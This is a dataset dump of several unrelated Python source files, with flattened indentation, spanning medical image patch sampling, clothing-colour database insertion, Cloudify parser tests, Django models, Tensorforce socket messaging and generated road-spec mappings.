Dataset schema (auto-generated column statistics from the dataset viewer; one record per source file):

  blob_id               string, 40 chars
  directory_id          string, 40 chars
  path                  string, 3 to 616 chars
  content_id            string, 40 chars
  detected_licenses     sequence, 0 to 112 entries
  license_type          string, 2 classes
  repo_name             string, 5 to 115 chars
  snapshot_id           string, 40 chars
  revision_id           string, 40 chars
  branch_name           string, 777 classes
  visit_date            timestamp[us], 2015-08-06 10:31:46 to 2023-09-06 10:44:38
  revision_date         timestamp[us], 1970-01-01 02:38:32 to 2037-05-03 13:00:00
  committer_date        timestamp[us], 1970-01-01 02:38:32 to 2023-09-06 01:08:06
  github_id             int64, 4.92k to 681M, nullable
  star_events_count     int64, 0 to 209k
  fork_events_count     int64, 0 to 110k
  gha_license_id        string, 22 classes
  gha_event_created_at  timestamp[us], 2012-06-04 01:52:49 to 2023-09-14 21:59:50, nullable
  gha_created_at        timestamp[us], 2008-05-22 07:58:19 to 2023-08-21 12:35:19, nullable
  gha_language          string, 149 classes
  src_encoding          string, 26 classes
  language              string, 1 value (Python)
  is_vendor             bool
  is_generated          bool
  length_bytes          int64, 3 to 10.2M
  extension             string, 188 classes
  content               string, 3 to 10.2M chars
  authors               sequence, length 1
  author_id             string, 1 to 132 chars
# === file: /MultiPlanarUNet/sequences/isotrophic_live_view_sequence_3d.py | repo: admshumar/MultiPlanarUNet | license: MIT | 7,050 bytes ===
from MultiPlanarUNet.sequences.isotrophic_live_view_sequence import IsotrophicLiveViewSequence
from MultiPlanarUNet.interpolation.sample_grid import sample_box, sample_box_at
from MultiPlanarUNet.interpolation.linalg import mgrid_to_points
import numpy as np
class IsotrophicLiveViewSequence3D(IsotrophicLiveViewSequence):
def __init__(self, image_pair_loader, real_box_dim, bg_class, scaler,
no_log=False, **kwargs):
super().__init__(image_pair_loader, **kwargs)
self.bg_class = bg_class
self.scaler = scaler
self.real_box_dim = real_box_dim
self.batch_shape = (self.batch_size, self.sample_dim, self.sample_dim,
self.sample_dim, self.n_classes)
if not no_log:
self.log()
def log(self):
self.logger("Using sample dim: %s" % self.sample_dim)
self.logger("Using box real dim: %s" % self.real_box_dim)
self.logger("Using real space sample res: %s" % (self.real_box_dim/
self.sample_dim))
self.logger("N fg slices: %s" % self.n_fg_slices)
self.logger("Batch size: %s" % self.batch_size)
self.logger("Force all FG: %s" % self.force_all_fg)
def __len__(self):
""" Controlled in train.py """
return 10000
@staticmethod
def _intrp_and_norm(image, grid, intrp_lab):
# Interpolate
im = image.interpolator.intrp_image(grid)
# Normalize
im = image.scaler.transform(im)
lab = None
if intrp_lab:
lab = image.interpolator.intrp_labels(grid)
return im, lab
def get_base_patches_from(self, image, return_y=False, batch_size=1):
real_dims = image.real_shape
# Calculate positions
sample_space = np.asarray([max(i, self.real_box_dim) for i in real_dims])
d = (sample_space - self.real_box_dim)
        min_cov = [np.ceil(sample_space[i]/self.real_box_dim).astype(int) for i in range(3)]
ds = [np.linspace(0, d[i], min_cov[i]) - sample_space[i]/2 for i in range(3)]
# Get placement coordinate points
placements = mgrid_to_points(np.meshgrid(*tuple(ds)))
for p in placements:
grid, axes, inv_mat = sample_box_at(real_placement=p,
sample_dim=self.sample_dim,
real_box_dim=self.real_box_dim,
noise_sd=0.0,
test_mode=True)
im, lab = self._intrp_and_norm(image, grid, return_y)
if return_y:
yield im, lab, grid, axes, inv_mat, len(placements)
else:
yield im, grid, axes, inv_mat, len(placements)
def get_N_random_patches_from(self, image, N, return_y=False):
if N > 0:
# Sample N patches from X
for i in range(N):
# Get grid and interpolate
grid, axes, inv_mat = sample_box(sample_dim=self.sample_dim,
real_box_dim=self.real_box_dim,
real_dims=image.real_shape,
noise_sd=self.noise_sd,
test_mode=True)
im, lab = self._intrp_and_norm(image, grid, return_y)
if return_y:
yield im, lab, grid, axes, inv_mat
else:
yield im, grid, axes, inv_mat
else:
return []
def __getitem__(self, idx):
"""
Used by keras.fit_generator to fetch mini-batches during training
"""
# If multiprocessing, set unique seed for this particular process
self.seed()
# Store how many slices has fg so far
has_fg = 0
has_fg_vec = np.zeros_like(self.fg_classes)
# Interpolate on a random index for each sample image to generate batch
batch_x, batch_y, batch_w = [], [], []
# Get a random image
max_tries = self.batch_size * 15
# Number of images to use in each batch. Number should be low enough
# to not exhaust queue generator.
N = 2 if self.image_pair_loader.queue else self.batch_size
cuts = np.round(np.linspace(0, self.batch_size, N+1)[1:])
scalers = []
bg_values = []
for i, image in enumerate(self.image_pair_loader.get_random(N=N)):
tries = 0
# Sample a batch from the image
while len(batch_x) < cuts[i]:
# Get grid and interpolate
mgrid = sample_box(sample_dim=self.sample_dim,
real_box_dim=self.real_box_dim,
real_dims=image.real_shape,
noise_sd=self.noise_sd)
# Get interpolated labels
lab = image.interpolator.intrp_labels(mgrid)
valid_lab, fg_change = self.validate_lab(lab, has_fg, len(batch_y))
if self.force_all_fg and tries < max_tries:
valid, has_fg_vec = self.validate_lab_vec(lab,
has_fg_vec,
len(batch_y))
if not valid:
tries += 1
continue
if valid_lab or tries > max_tries:
# Get interpolated image
im = image.interpolator.intrp_image(mgrid)
if tries > max_tries or self.is_valid_im(im, image.bg_value):
# Update foreground counter
has_fg += fg_change
# Save scaler to normalize image later (after potential
# augmentation)
scalers.append(image.scaler)
# Save bg value if needed in potential augmenters
bg_values.append(image.bg_value)
# Add to batches
batch_x.append(im)
batch_y.append(lab)
batch_w.append(image.sample_weight)
# Apply augmentation if specified
batch_x, batch_y, batch_w = self.augment(batch_x, batch_y,
batch_w, bg_values)
# Normalize images
batch_x = self.scale(batch_x, scalers)
# Reshape, one-hot encode etc.
batch_x, batch_y, batch_w = self.prepare_batches(batch_x,
batch_y,
batch_w)
assert len(batch_x) == self.batch_size
return batch_x, batch_y, batch_w
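# Usage sketch (added for illustration; ``seq`` and ``img`` stand for
# hypothetical IsotrophicLiveViewSequence3D and image-pair instances):
#
#     for im, grid, axes, inv_mat in seq.get_N_random_patches_from(img, N=4):
#         ...  # each ``im`` is an interpolated, normalized cube of side sample_dim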
# === file: /cell2cell/external/__init__.py | repo: earmingol/cell2cell | license: BSD-3-Clause | 257 bytes ===
from cell2cell.external.pcoa import (pcoa, pcoa_biplot, _check_ordination)
from cell2cell.external.goenrich import (goa, ontology)
from cell2cell.external.gseapy import (load_gmt, generate_lr_geneset, run_gsea)
from cell2cell.external.umap import (run_umap)
# === file: /photoo/tendance_file/TENDANCE/remplir_database/analyse_femme_haut.py | repo: LeGrosLezard/bobo | no license | 8,505 bytes ===
import sys
import os
import cv2
from colour import *
import numpy as np
from PIL import Image, ImageDraw, ImageChops
from matplotlib import pyplot as plt
import math
from palettecouleur_coiffure import couleur_cheuvelure
from coul import *
from palettecouleur import DICO_COULEUR
from database import insertion_table
import psycopg2
import shutil
from config import HOST
from config import USER
from config import PASSWORD
from config import DATABASE
from config import LISTE2
def resize(img, save):
"""We resizing picture to 100x 100y"""
image = Image.open(img)
image = image.resize((100,100))
image.save(save)
def mask_bas(i):
"""We create the first mask for jean for example
we take the bottom of the picture"""
print('mask bas de :', i)
img = Image.open(i)
masque = Image.new('RGB', img.size, color=(255,255,255))
a = img.size[0] / 100 *30
b = img.size[1] / 100* 70
c = 0
d = img.size[1]
coords = (a,b, c,d)
masque_draw = ImageDraw.Draw(masque)
masque_draw.rectangle(coords, fill=(0,0,0))
diff = ImageChops.lighter(img, masque)
img = img.rotate(180)
img.crop((0, 0, b/2, a)).save('traitement_bas1.jpg')
print('fin')
def mask_haut(i):
"""We create the second mask for t-shirt for example
we take the top of the picture"""
img = Image.open(i)
print('mask haut de :', i)
masque = Image.new('RGB', img.size, color=(255,255,255))
a = img.size[1]
b = img.size[0] / 100 * 100
c = 0
d = 0
coords = (a,b, c,d)
masque_draw = ImageDraw.Draw(masque)
masque_draw.rectangle(coords, fill=(0,0,0))
diff = ImageChops.lighter(img, masque)
img.crop((0, 0, b, a/2)).save('traitement_haut.jpg')
def couleur_habit(im):
"""We recuperate all color from
the picture"""
print(im, ' : en cours')
image = cv2.imread(im)
print('ok')
largeur = image.shape[1]
hauteur = image.shape[0]
taille = largeur * hauteur
print('ok1')
    # Load the color database once instead of re-parsing it for every pixel.
    colordb = get_colordb('bobo.txt')
    if not colordb:
        print('No parseable color database found')
        sys.exit(1)
    couleur_liste = []
    for x in range(image.shape[0]):
        for y in range(image.shape[1]):
            nearest = colordb.nearest(image[x,y][2],
                                      image[x,y][1],
                                      image[x,y][0])
            couleur_liste.append(nearest)
print('ok2')
return taille, couleur_liste
def function_couleur_cheveux(image):
"""Here we recuperate the
most value into the picture"""
dico = {}
im = Image.open(image)
for value in im.getdata():
if value in dico.keys():
dico[value] += 1
else:
dico[value] = 1
liste = []
for cle, valeur in dico.items():
liste.append((cle, valeur))
return liste
def function_couleur_cheveux1(liste):
"""We destroy all white (background)"""
liste2 = []
for i in liste:
if i[0][0] >= 240 and\
i[0][1] >= 240 and\
i[0][2] >= 240:
pass
else:
liste2.append(i)
return liste2
def function_couleur_cheveux2(liste2):
"""Here we scoring the last most value from
the picture"""
dico_couleur = {'marron':0, 'noir':0, 'blond':0}
for i in liste2:
coul = couleur_cheuvelure(i[0][0], i[0][1], i[0][2])
if coul == None:
pass
else:
if coul == 'blond':
dico_couleur['blond'] += 1
elif coul == 'marron':
dico_couleur['marron'] += 1
elif coul == 'noir':
dico_couleur['noir'] += 1
return dico_couleur
def couleur_cheveux(image):
"""We analysis data from
haircuts picture for
determinate the color"""
liste = function_couleur_cheveux(image)
liste2 = function_couleur_cheveux1(liste)
dico_couleur = function_couleur_cheveux2(liste2)
if dico_couleur['blond'] > dico_couleur['marron'] + 1000 and\
dico_couleur['blond'] > dico_couleur['noir']:
print('couleur de cheveux blond')
return 'blond'
elif dico_couleur['marron'] > dico_couleur['blond'] + 1000 and\
dico_couleur['marron'] > dico_couleur['noir']:
print('couleur de cheveux marron')
return 'marron'
elif dico_couleur['noir'] > dico_couleur['blond'] and\
         dico_couleur['noir'] > dico_couleur['marron']:
print('couleur de cheveux noir')
return 'noir'
elif dico_couleur['marron'] >= dico_couleur['blond'] + 400 and\
dico_couleur['marron'] > dico_couleur['noir']:
print('couleur de cheveux chatin')
return 'chatin'
elif dico_couleur['blond'] >= dico_couleur['marron'] + 400 and\
dico_couleur['blond'] > dico_couleur['noir']:
print('couleur de cheveux chatin')
return 'chatin'
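# Usage sketch (added; 'cheveux.jpg' is a hypothetical input file):
#
#     teinte = couleur_cheveux('cheveux.jpg')
#     # -> 'blond', 'marron', 'noir' or 'chatin' (None if no rule matches)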
def insertion_info(nom, sexe, haut, bas, taille_haut, taille_bas):
"""We insert data into the database"""
conn = psycopg2.connect(database=DATABASE,
user=USER,
host=HOST,
password=PASSWORD)
cur = conn.cursor()
cur.execute("""insert into bobo1
(image, sexe, haut, bas, taille_haut, taille_bas)
values(%s, %s, %s, %s, %s, %s);""",
(nom, sexe, haut, bas, taille_haut,
taille_bas))
conn.commit()
def ccoiffure(image, coiffure):
"""We insert haircuts in the database"""
conn = psycopg2.connect(database=DATABASE,
user=USER,
host=HOST,
password=PASSWORD)
cur = conn.cursor()
cur.execute("""insert into bobo1_coiffure
(image, coiffure)
values(%s, %s);""", (image, coiffure))
conn.commit()
def pré_visualisation_donnée(table):
conn = psycopg2.connect(database=DATABASE,
user=USER,
host=HOST,
password=PASSWORD)
cur = conn.cursor()
cur.execute("""SELECT * from {}""".format(table))
rows = cur.fetchall()
liste = [i for i in rows]
return liste
def function_traitement():
"""Here we call database
for see if we have news pictures."""
os.chdir('/app/static/bobo')
liste = os.listdir()
element = pré_visualisation_donnée('bobo1')
element2 = pré_visualisation_donnée('bobo1_coiffure')
for i in element:
LISTE2.append(i[1])
for i in element2:
LISTE2.append(i[1])
set1 = set(LISTE2)
set2 = set(liste)
liste3 = []
for a in set1 :
if not(a in set2):
print(a)
for b in set2 :
if not(b in set1):
liste3.append(b)
return liste3
def traitement():
"""Here we insert picture of body and
haircuts into database with them colors"""
liste3 = function_traitement()
print(sorted(liste3),'000000000LISTE3')
for i in sorted(liste3):
print(i)
nom = i[-5:-4]
if nom == 'a':
mask_bas(i)
resize('traitement_bas1.jpg', 'traitement_bas1.jpg')
bas = couleur_habit('traitement_bas1.jpg')
mask_haut(i)
resize('traitement_haut.jpg', 'traitement_haut.jpg')
haut = couleur_habit('traitement_haut.jpg')
insertion_info(i, 'féminin', haut[1], bas[1],
haut[0], bas[0])
elif nom == 'b':
coiffure = couleur_cheveux(i)
print(coiffure)
ccoiffure(i, coiffure)
# === file: /dsl_parser/tests/test_get_consumers.py | repo: cloudify-cosmo/cloudify-common | license: Apache-2.0 | 3,239 bytes ===
from dsl_parser import functions
from dsl_parser.tasks import prepare_deployment_plan
from dsl_parser.tests.abstract_test_parser import AbstractTestParser
class TestGetConsumers(AbstractTestParser):
def setUp(self):
super(TestGetConsumers, self).setUp()
self.mock_storage = self.mock_evaluation_storage(
consumers={
'app1': 'App1',
'app2': 'My Second App',
'app3': 'App #3'
})
def test_node_template_properties_simple(self):
yaml = """
node_types:
type:
properties:
property: {}
node_templates:
node:
type: type
properties:
property: { get_consumers: ids }
"""
parsed = prepare_deployment_plan(self.parse_1_3(yaml))
node = self.get_node_by_name(parsed, 'node')
self.assertEqual({'get_consumers': 'ids'},
node['properties']['property'])
functions.evaluate_functions(parsed, {}, self.mock_storage)
self.assertEqual(set(node['properties']['property']),
{'app1', 'app2', 'app3'})
def test_consumers_in_outputs(self):
yaml = """
node_types:
type: {}
node_templates:
node:
type: type
outputs:
consumers:
value: { get_consumers: ids }
consumer_count:
value: { get_consumers: count }
"""
parsed = prepare_deployment_plan(self.parse_1_3(yaml))
outputs = parsed.outputs
self.assertEqual({'get_consumers': 'ids'},
outputs['consumers']['value'])
functions.evaluate_functions(parsed, {}, self.mock_storage)
self.assertEqual(set(outputs['consumers']['value']),
{'app1', 'app2', 'app3'})
self.assertEqual(outputs['consumer_count']['value'], 3)
def test_consumers_in_inputs(self):
yaml = """
inputs:
consumer_count:
default: { get_consumers: count }
consumer_names:
default: { get_consumers: names }
node_types:
type: {}
node_templates:
node:
type: type
outputs:
consumers:
value: { get_input: consumer_names }
consumer_count:
value: { get_input: consumer_count }
"""
parsed = prepare_deployment_plan(self.parse_1_3(yaml))
outputs = parsed.outputs
# `get_input` is evaluated at parse time, so we expect to see it
# replaced here with the `get_consumers_count` function
self.assertEqual({'get_consumers': 'count'},
outputs['consumer_count']['value'])
functions.evaluate_functions(parsed, {}, self.mock_storage)
self.assertEqual(outputs['consumer_count']['value'], 3)
self.assertEqual(set(outputs['consumers']['value']),
{'App1', 'My Second App', 'App #3'})
def test_illegal_arguments(self):
yaml = """
node_types:
type:
properties:
property: {}
node_templates:
node:
type: type
properties:
property: { get_consumers: [a, b] }
"""
self.assertRaisesRegex(
ValueError,
"Illegal argument passed to get_consumers",
self.parse_1_3,
yaml)
# === file: /sdBs/AllRun/sdssj_092520.01+273619.7/sdB_SDSSJ_092520.01+273619.7_coadd.py | repo: tboudreaux/SummerSTScICode | no license | 482 bytes ===
from gPhoton.gMap import gMap
def main():
gMap(band="NUV", skypos=[141.333375,27.605472], skyrange=[0.0333333333333,0.0333333333333], stepsz = 30., cntfile="/data2/fleming/GPHOTON_OUTPUT/LIGHTCURVES/sdBs/sdB_SDSSJ_092520.01+273619.7/sdB_SDSSJ_092520.01+273619.7_movie_count.fits", cntcoaddfile="/data2/fleming/GPHOTON_OUTPUT/LIGHTCURVES/sdB/sdB_SDSSJ_092520.01+273619.7/sdB_SDSSJ_092520.01+273619.7_count_coadd.fits", overwrite=True, verbose=3)
if __name__ == "__main__":
main()
# === file: /proj/app/models.py | repo: Sentret/classificator | no license | 1,203 bytes ===
from django.db import models
class Topic(models.Model):
name = models.CharField(max_length=100)
classifier = models.ForeignKey('Classifier', blank=True, null=True)
class Meta:
unique_together = ('name', 'classifier',)
def __str__(self):
return self.name
class Classifier(models.Model):
name = models.CharField(max_length=100)
discription = models.TextField(max_length=1000, null=True)
version = models.ForeignKey('ClassifierVersion', blank=True, null=True)
status = models.CharField(max_length=8, default='Не обучен')
path_to_bin = models.CharField(max_length=100, null=True)
def save(self, *args, **kwargs):
self.path_to_bin = str(self.name) + '_pickle'
return super(Classifier, self).save(*args, **kwargs)
def __str__(self):
return self.name
class ClassifierVersion(models.Model):
topics = models.ManyToManyField('Topic')
version = models.IntegerField()
    # path to the file holding the serialized (pickled) object
path_to_bin = models.CharField(max_length=25)
    def __str__(self):
        # The original referenced a nonexistent ``self.classifier`` field and
        # an undefined ``version`` name; use the model's own version instead.
        return str(self.version)
# === file: /tests/benchmarks/base_utils.py | repo: tods-doc/d3m | license: Apache-2.0 | 1,618 bytes ===
from d3m import container
from d3m.base import utils as base_utils
class CombineColumns:
params = [[100, 300, 500, 700, 900]]
param_names = ['columns']
def setup(self, columns):
self.large_dataframe_with_many_columns = container.DataFrame({str(i): [j for j in range(5)] for i in range(columns)}, columns=[str(i) for i in range(columns)], generate_metadata=True)
self.list_of_many_dataframe_columns = [
container.DataFrame({str(i): [j for j in range(5, 10)]}, columns=[str(i)], generate_metadata=True)
for i in range(int(columns / 2))
]
def time_append(self, columns):
base_utils.combine_columns(
self.large_dataframe_with_many_columns,
list(range(int(columns / 4), int(columns / 2))), # Just 1/4 of columns.
self.list_of_many_dataframe_columns,
return_result='append',
add_index_columns=True,
)
def time_replace(self, columns):
base_utils.combine_columns(
self.large_dataframe_with_many_columns,
list(range(int(columns / 4), int(columns / 2))), # Just 1/4 of columns.
self.list_of_many_dataframe_columns,
return_result='replace',
add_index_columns=True,
)
def time_new(self, columns):
base_utils.combine_columns(
self.large_dataframe_with_many_columns,
list(range(int(columns / 4), int(columns / 2))), # Just 1/4 of columns.
self.list_of_many_dataframe_columns,
return_result='new',
add_index_columns=True,
)
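# Note (added): this class follows the airspeed velocity (asv) benchmark
# convention -- ``params``/``param_names`` define the parameter grid, ``setup``
# prepares the data for each ``columns`` value, and the ``time_*`` methods are
# what actually gets timed.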
# === file: /0x0A-python-inheritance/100-my_int.py | repo: feliciahsieh/holbertonschool-higher_level_programming | no license | 541 bytes ===
#!/usr/bin/python3
class MyInt(int):
"""
MyInt - class that inherits from int
"""
def __eq__(self, other):
"""
__eq__ - redefine == to !=
Args:
other - other operand
Return:
True if Not_Equal to
"""
return int(self) != int(other)
def __ne__(self, other):
"""
__ne__ - redefine != to ==
Args:
other - other operand
Return:
True if Equal to
"""
return int(self) == int(other)
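# Illustrative check (added; not part of the original exercise file):
# MyInt swaps the meaning of the comparison operators.
#
#     i = MyInt(3)
#     print(i == 3)   # False, because __eq__ now tests inequality
#     print(i != 3)   # True, because __ne__ now tests equality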
# === file: /tensorforce/environments/socket_environment.py | repo: marload/tensorforce | license: Apache-2.0 | 5,808 bytes ===
# Copyright 2020 Tensorforce Team. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from socket import SHUT_RDWR, socket as Socket
import msgpack
import msgpack_numpy
from tensorforce import TensorforceError, util
from tensorforce.environments import RemoteEnvironment
msgpack_numpy.patch()
class SocketEnvironment(RemoteEnvironment):
"""
An earlier version of this code (#626) was originally developed as part of the following work:
Rabault, J., Kuhnle, A (2019). Accelerating Deep Reinforcement Leaning strategies of Flow
Control through a multi-environment approach. Physics of Fluids.
"""
MAX_BYTES = 4096
@classmethod
def remote(cls, port, environment, max_episode_timesteps=None, **kwargs):
socket = Socket()
socket.bind(('', port))
socket.listen(1)
connection, address = socket.accept()
socket.close()
super().remote(
connection=connection, environment=environment,
max_episode_timesteps=max_episode_timesteps, **kwargs
)
@classmethod
def proxy_send(cls, connection, function, **kwargs):
str_function = function.encode()
num_bytes = len(str_function)
str_num_bytes = '{:08d}'.format(num_bytes).encode()
bytes_sent = connection.send(str_num_bytes + str_function)
if bytes_sent != num_bytes + 8:
raise TensorforceError.unexpected()
str_kwargs = msgpack.packb(o=kwargs)
num_bytes = len(str_kwargs)
str_num_bytes = '{:08d}'.format(num_bytes).encode()
bytes_sent = connection.send(str_num_bytes + str_kwargs)
if bytes_sent != num_bytes + 8:
raise TensorforceError.unexpected()
@classmethod
def proxy_receive(cls, connection):
str_success = connection.recv(1)
if len(str_success) != 1:
raise TensorforceError.unexpected()
success = bool(str_success)
str_num_bytes = connection.recv(8)
if len(str_num_bytes) != 8:
raise TensorforceError.unexpected()
num_bytes = int(str_num_bytes.decode())
str_result = b''
for n in range(num_bytes // cls.MAX_BYTES):
str_result += connection.recv(cls.MAX_BYTES)
            if len(str_result) != (n + 1) * cls.MAX_BYTES:
raise TensorforceError.unexpected()
str_result += connection.recv(num_bytes % cls.MAX_BYTES)
if len(str_result) != num_bytes:
raise TensorforceError.unexpected()
result = msgpack.unpackb(packed=str_result)
decode = (lambda x: x.decode() if isinstance(x, bytes) else x)
result = util.fmap(function=decode, xs=result, map_keys=True)
return success, result
@classmethod
def proxy_close(cls, connection):
connection.shutdown(SHUT_RDWR)
connection.close()
@classmethod
def remote_send(cls, connection, success, result):
str_success = str(int(success)).encode()
bytes_sent = connection.send(str_success)
if bytes_sent != 1:
raise TensorforceError.unexpected()
str_result = msgpack.packb(o=result)
num_bytes = len(str_result)
str_num_bytes = '{:08d}'.format(num_bytes).encode()
bytes_sent = connection.send(str_num_bytes + str_result)
assert bytes_sent == num_bytes + 8
if bytes_sent != num_bytes + 8:
raise TensorforceError.unexpected()
@classmethod
def remote_receive(cls, connection):
str_num_bytes = connection.recv(8)
if len(str_num_bytes) != 8:
raise TensorforceError.unexpected()
num_bytes = int(str_num_bytes.decode())
str_function = b''
for n in range(num_bytes // cls.MAX_BYTES):
str_function += connection.recv(cls.MAX_BYTES)
            if len(str_function) != (n + 1) * cls.MAX_BYTES:
raise TensorforceError.unexpected()
str_function += connection.recv(num_bytes % cls.MAX_BYTES)
if len(str_function) != num_bytes:
raise TensorforceError.unexpected()
function = str_function.decode()
str_num_bytes = connection.recv(8)
if len(str_num_bytes) != 8:
raise TensorforceError.unexpected()
num_bytes = int(str_num_bytes.decode())
str_kwargs = b''
for n in range(num_bytes // cls.MAX_BYTES):
str_kwargs += connection.recv(cls.MAX_BYTES)
            if len(str_kwargs) != (n + 1) * cls.MAX_BYTES:
raise TensorforceError.unexpected()
str_kwargs += connection.recv(num_bytes % cls.MAX_BYTES)
if len(str_kwargs) != num_bytes:
raise TensorforceError.unexpected()
kwargs = msgpack.unpackb(packed=str_kwargs)
decode = (lambda x: x.decode() if isinstance(x, bytes) else x)
kwargs = util.fmap(function=decode, xs=kwargs, map_keys=True)
return function, kwargs
@classmethod
def remote_close(cls, connection):
connection.shutdown(SHUT_RDWR)
connection.close()
def __init__(self, host, port, blocking=False):
socket = Socket()
socket.connect((host, port))
super().__init__(connection=socket, blocking=blocking)
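# Wire-format summary (added, restating what the code above implements): every
# payload is prefixed with an 8-byte ASCII decimal length; function names
# travel as raw UTF-8, kwargs and results as msgpack blobs, and remote
# responses carry an extra leading 1-byte success flag.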
# === file: /src/OTLMOW/PostenMapping/Model/Post060261215.py | repo: davidvlaminck/OTLMOW | license: MIT | 4,912 bytes ===
# coding=utf-8
from OTLMOW.PostenMapping.StandaardPost import StandaardPost
from OTLMOW.PostenMapping.StandaardPostMapping import StandaardPostMapping
# Generated with PostenCreator. To modify: extend, do not edit
class Post060261215(StandaardPost):
def __init__(self):
super().__init__(
nummer='0602.61215',
beschrijving='Toplaag, bouwklassegroep B1-B3 volgens 6-2, type SMA-C2 met polymeerbitumen, dikte E = 5 cm',
meetstaateenheid='M2',
mappings=[StandaardPostMapping(
typeURI='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#BitumineuzeLaag',
attribuutURI='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#DtuBVLaagtypes.laagtype',
dotnotation='laagtype.laagtype',
defaultWaarde='andere-toplagen',
range='',
usagenote='',
isMeetstaatAttr=0,
isAltijdInTeVullen=0,
isBasisMapping=1,
mappingStatus='gemapt 2.0',
mappingOpmerking='',
standaardpostnummer='0602.61215')
, StandaardPostMapping(
typeURI='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#BitumineuzeLaag',
attribuutURI='https://wegenenverkeer.data.vlaanderen.be/ns/abstracten#Laag.laagRol',
dotnotation='laagRol',
defaultWaarde='verharding',
range='',
usagenote='',
isMeetstaatAttr=0,
isAltijdInTeVullen=0,
isBasisMapping=1,
mappingStatus='gemapt 2.0',
mappingOpmerking='',
standaardpostnummer='0602.61215')
, StandaardPostMapping(
typeURI='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#BitumineuzeLaag',
attribuutURI='https://wegenenverkeer.data.vlaanderen.be/ns/abstracten#LaagBouwklasse.bouwklasse',
dotnotation='bouwklasse',
defaultWaarde='',
range='B1|B2|B3',
usagenote='',
isMeetstaatAttr=0,
isAltijdInTeVullen=1,
isBasisMapping=1,
mappingStatus='gemapt 2.0',
mappingOpmerking='',
standaardpostnummer='0602.61215')
, StandaardPostMapping(
typeURI='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#BitumineuzeLaag',
attribuutURI='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#BitumineuzeLaag.mengseltype',
dotnotation='mengseltype',
defaultWaarde='SMA-C2',
range='',
usagenote='',
isMeetstaatAttr=0,
isAltijdInTeVullen=0,
isBasisMapping=1,
mappingStatus='gemapt 2.0',
mappingOpmerking='',
standaardpostnummer='0602.61215')
, StandaardPostMapping(
typeURI='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#BitumineuzeLaag',
attribuutURI='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#BitumineuzeLaag.bindmiddelType',
dotnotation='bindmiddelType',
defaultWaarde='polymeerbitumen',
range='',
usagenote='',
isMeetstaatAttr=0,
isAltijdInTeVullen=0,
isBasisMapping=1,
mappingStatus='gemapt 2.0',
mappingOpmerking='',
standaardpostnummer='0602.61215')
, StandaardPostMapping(
typeURI='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#BitumineuzeLaag',
attribuutURI='https://wegenenverkeer.data.vlaanderen.be/ns/abstracten#LaagDikte.dikte',
dotnotation='dikte',
defaultWaarde='5',
range='',
usagenote='cm^^cdt:ucumunit',
isMeetstaatAttr=0,
isAltijdInTeVullen=0,
isBasisMapping=1,
mappingStatus='gemapt 2.0',
mappingOpmerking='',
standaardpostnummer='0602.61215')
, StandaardPostMapping(
typeURI='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#BitumineuzeLaag',
attribuutURI='https://wegenenverkeer.data.vlaanderen.be/ns/abstracten#Laag.oppervlakte',
dotnotation='oppervlakte',
defaultWaarde='',
range='',
usagenote='m2^^cdt:ucumunit',
isMeetstaatAttr=1,
isAltijdInTeVullen=1,
isBasisMapping=1,
mappingStatus='gemapt 2.0',
mappingOpmerking='',
standaardpostnummer='0602.61215')])
# === file: /orders/models.py | repo: sadakchap/basic-ecommerce-site | no license | 1,301 bytes ===
from django.db import models
from shop.models import Product
# Create your models here.
class Order(models.Model):
first_name = models.CharField(max_length=255)
last_name = models.CharField(max_length=255)
email = models.EmailField()
address = models.CharField(max_length=255)
postal_code = models.CharField(max_length=10)
city = models.CharField(max_length=200)
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
paid = models.BooleanField(default=False)
    braintree_id = models.CharField(max_length=150, blank=True)
def __str__(self):
return 'Order {}'.format(self.id)
class Meta:
ordering = ('-created',)
def get_total_cost(self):
return sum([i.get_cost() for i in self.items.all()])
class OrderItem(models.Model):
order = models.ForeignKey(Order,on_delete=models.CASCADE,related_name='items')
product = models.ForeignKey(Product,on_delete=models.CASCADE,related_name='order_items')
price = models.DecimalField(max_digits=10,decimal_places=2)
quantity= models.PositiveIntegerField(default=1)
def __str__(self):
return '{}'.format(self.id)
def get_cost(self):
return self.price * self.quantity
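# Usage sketch (added; assumes an existing Order row with related items):
#
#     order = Order.objects.get(pk=1)
#     order.get_total_cost()   # sum of item.price * item.quantity over order.items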
# === file: /descarteslabs/workflows/models/versionedgraft.py | repo: carderne/descarteslabs-python | license: Apache-2.0 | 5,341 bytes ===
import json
import textwrap
from descarteslabs.common.graft import client as graft_client
from descarteslabs.common.proto.workflow import workflow_pb2
from descarteslabs.workflows import _channel
from descarteslabs.workflows.cereal import deserialize_typespec, serialize_typespec
from descarteslabs.workflows.client import get_global_grpc_client
class VersionedGraft:
"""
A specific version of a Workflow.
Except in advanced cases, you shouldn't need to interact with this object much—you'll primarily
use the `Workflow` object and `wf.use <.models.use>`.
"""
def __init__(self, version, proxy_object, docstring="", labels=None):
"""
Construct a VersionedGraft object from a proxy object.
You shouldn't construct a `VersionedGraft` directly; use `Workflow.set_version`
or `wf.publish <.models.publish>` instead.
Parameters
----------
version: str
Version of the graft. This should adhere to the semantic versioning schema (https://semver.org).
proxy_object: Proxytype
The proxy object source of the graft.
docstring: str, default ""
Docstring for the VersionedGraft.
labels: dict, optional
Key-value pair labels to add to the VersionedGraft.
Returns
-------
VersionedGraft
"""
typespec = serialize_typespec(type(proxy_object))
graft = proxy_object.graft
message = workflow_pb2.VersionedGraft(
version=version,
serialized_graft=json.dumps(graft),
channel=_channel.__channel__,
typespec=typespec,
docstring=textwrap.dedent(docstring),
labels=labels,
)
self._object = proxy_object
self._message = message
@classmethod
def get(cls, workflow_id, version, client=None):
"""
Get a specific `VersionedGraft` of a `Workflow`.
Parameters
----------
workflow_id: str
